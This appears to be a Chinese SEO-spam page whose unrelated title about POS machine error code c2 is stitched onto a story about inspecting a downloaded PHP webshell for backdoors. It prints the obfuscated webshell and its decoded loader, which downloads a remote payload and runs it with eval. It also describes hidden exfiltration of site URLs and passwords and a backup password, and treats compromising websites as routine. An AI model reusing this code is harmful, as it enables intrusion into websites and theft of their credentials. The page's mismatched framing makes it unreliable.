網(wǎng)上有很多關(guān)于pos機(jī)錯(cuò)誤代碼c2,PHP WebShell代碼后門的一次檢查的知識(shí)，也有很多人為大家解答關(guān)于pos機(jī)錯(cuò)誤代碼c2的問(wèn)題，今天pos機(jī)之家(www.tjfsxbj.com)為大家整理了關(guān)于這方面的知識(shí)，讓我們一起來(lái)看下吧!

本文目錄一覽：

1、pos機(jī)錯(cuò)誤代碼c2

pos機(jī)錯(cuò)誤代碼c2

小明是一名Web小白，今天他突然心血來(lái)潮，對(duì)自己常用的大馬代碼查看一下，竟然發(fā)現(xiàn)還是有一些后門沒有清除干凈，不由得心里為之一顫抖，這個(gè)江湖果然是險(xiǎn)惡重生，黑吃黑的事情經(jīng)常發(fā)生。想起自己辛辛苦苦得到的站點(diǎn)都成了別人的嫁衣，遂決定好好的分析馬兒的肚子內(nèi)部結(jié)構(gòu)，特洛伊的騙局決不能讓它再次坑害新手。

回想起來(lái)馬兒好像是哪個(gè)網(wǎng)站上面下載的，小明快速的打開瀏覽器，搜索引擎輸入“Web大馬”，出現(xiàn)了繽紛多彩的信息。

好像就是這個(gè)網(wǎng)站，進(jìn)去之后看看介紹，感覺好高大上黑色的背景配合綠色，灰白色的界面，這不正是小白們心里的標(biāo)配馬嗎？好的，就是這匹寶馬了。

不知道這寶馬有木有介紹的那么好，竟然能過(guò)一切waf,諸多安全軟件都免殺。有如此良駒，在滲透的時(shí)候必然是過(guò)五關(guān)斬六將。小明的手顫抖的移動(dòng)鼠標(biāo)到底部，看到下載地址，狠狠的點(diǎn)擊一下，只聽得叮的一聲，馬兒就掉到了自己的目錄里面，

迫不及待的解壓之后，看到一個(gè)shell.php,大小只有1.83KB,這體重和小馬有的一拼了。

<?php $password=\'xxxxx\';//登錄密碼 //本次更新：體積優(yōu)化、壓縮優(yōu)化、命令優(yōu)化、反彈優(yōu)化、文件管理優(yōu)化、掛馬清馬優(yōu)化等大量功能細(xì)節(jié)優(yōu)化。 //功能特色：PHP高版本低版本都能執(zhí)行，文件短小精悍，方便上傳，功能強(qiáng)大，提權(quán)無(wú)痕跡，無(wú)視waf，過(guò)安全狗、云鎖、360、阿里云、護(hù)衛(wèi)神等主流waf。同時(shí)支持菜刀、xise連接。$html=\'$password\'.\'=\'."\'".$password."\';".\'@e#html\'.\'\'.\'v\'."".\'\'.\'\'."".\'\'.\'\'.\'\'.\'a\'.\'\'.\'l(\'.\'g\'.\'\'."".\'\'.\'\'.\'z\'.\'i\'.\'\'.\'\'.\'n\'.\'f\'.\'l\'.\'\'.\'\'."".\'a\'.\'t\'.\'e(b\'.\'as\'.\'\'.\'\'.\'\'."".\'\'.\'e\'.\'6\'.\'\'."".\'\'."".""."".\'\'.\'4_\'.\'d\'.\'e\'.\'c\'.\'\'.\'\'.\'\'."".\'\'."".\'o\'.\'d\'.\'e\'.\'(\'."\'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=\')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css(\'\',preg_replace("/#html/","",$html));$style();/*));.\'<linkrel="stylesheet"href="$#css"/>\';*/

咋一看這不是base64嗎，如此小的代碼竟然實(shí)現(xiàn)了諸多的功能。著實(shí)讓人佩服作者，打開phpstorm直接base64解密得到了下面這段內(nèi)容

error_reporting(0); session_start(); if (!isset($_SESSION["phpapi"])) { $c = \'\'; $useragent = \'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\'; $url = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg==")); $urlNew= base64_decode("LzBPbGlha1RIaXNQOGhwMGFkcGg5cGFwaTUrcjZlY2kwYTh5aWptZzlveGNwOWNrdmhmLw=="); if (function_exists(\'fsockopen\')) { $link = parse_url($url); $query = $link[\'path\']; $host = strtolower($link[\'host\']); $fp = fsockopen($host, 80, $errno, $errstr, 10); if ($fp) { $out = "GET /{$query} HTTP/1.0\\"; $out .= "Host: {$host}\\"; $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\\"; $out .= "Connection: Close\\\\"; fwrite($fp, $out); $inheader = 1; $contents = ""; while (!feof($fp)) { $line = fgets($fp, 4096); if ($inheader == 0) { $contents .= $line; } if ($inheader && ($line == "\" || $line == "\\")) { $inheader = 0; } } fclose($fp); $c = $contents; } } if (!strpos($c, $urlNew) && function_exists(\'curl_init\') && function_exists(\'curl_exec\')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); $c = curl_exec($ch); curl_close($ch); } if (!strpos($c, $urlNew) && ini_get(\'allow_url_fopen\')) { $temps = @file($url); if (!empty($temps)) $c = @implode(\'\', $temps); if (!strpos($c, "delDirAndFile")) $c = @file_get_contents($url); } if (strpos($c, $urlNew) !== false) { $c = str_replace($urlNew, "", $c); $_SESSION["phpapi"] = gzinflate(base64_decode($c)); } } if (isset($_SESSION["phpapi"])) { eval($_SESSION["phpapi"]); }

原來(lái)作者是通過(guò)遠(yuǎn)程下載圖片的方式得到大馬的內(nèi)容，難怪可以逃過(guò)免殺啊，根本就是普通的php代碼，這樣以來(lái)作者就可以明正言順的得到我們的url了，真的是躺著也能樂呵呵的數(shù)馬兒，今年又是一個(gè)豐收年啊。

$url = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg==")); $url base64解開后的到http://xxx.xxx/404.gif在得到圖片的內(nèi)容后用base64解開然后zip解壓我們得到了真的馬兒，打開瀏覽器后一看果然和網(wǎng)站上介紹的是一個(gè)模樣的。輸入密碼登陸后，看到這樣的馬兒用起來(lái)才叫爽啊，

為了看看大馬兒的內(nèi)部還有什么手段，祭出Firefox，按下f12,輸入密碼后查看網(wǎng)絡(luò)連接，發(fā)現(xiàn)視乎沒有什么其他的外部活動(dòng)，js也是非常的安靜。新想這馬兒應(yīng)該是安全的。再次查看了httpnetworksniff和TcpLogView，沒有外部的連接活動(dòng)。但還是非常不放心，在phpstorm里面看了下base64加密的字符串，看到一個(gè)函數(shù)非常可疑

其中htmlogin()函數(shù)內(nèi)部 if (strpos($domain, “0.0″) !== false || strpos($domain, “192.168.”) !== false || strpos($domain, “l(fā)ocalhost”) !== false) 以及show_mainp()函數(shù)都對(duì)局域網(wǎng)ip特征做了判斷，判斷了是否為局域網(wǎng)，不然就發(fā)送你的地址和密碼到他的網(wǎng)站，http://xx.xx/api.php?name=filename.php&value=password&id=ip

然而到此結(jié)束了嗎？？？通常WebShell會(huì)有一個(gè)備用的密碼，搜尋了一下postpass 在1709行發(fā)現(xiàn)了備用密碼if ($_POST[\'postpass\'] == postpass||$_POST[\'postpass\']==’http200ok’)

還是那句話江湖險(xiǎn)惡，不要輕易的用別人寫好加密的東西，很多軟件最好翻墻或者先去github上找找。webshell這種東西要自己動(dòng)手查看內(nèi)容確定安全后才能放心使用。

以上就是關(guān)于pos機(jī)錯(cuò)誤代碼c2,PHP WebShell代碼后門的一次檢查的知識(shí)，后面我們會(huì)繼續(xù)為大家整理關(guān)于pos機(jī)錯(cuò)誤代碼c2的知識(shí)，希望能夠幫助到大家！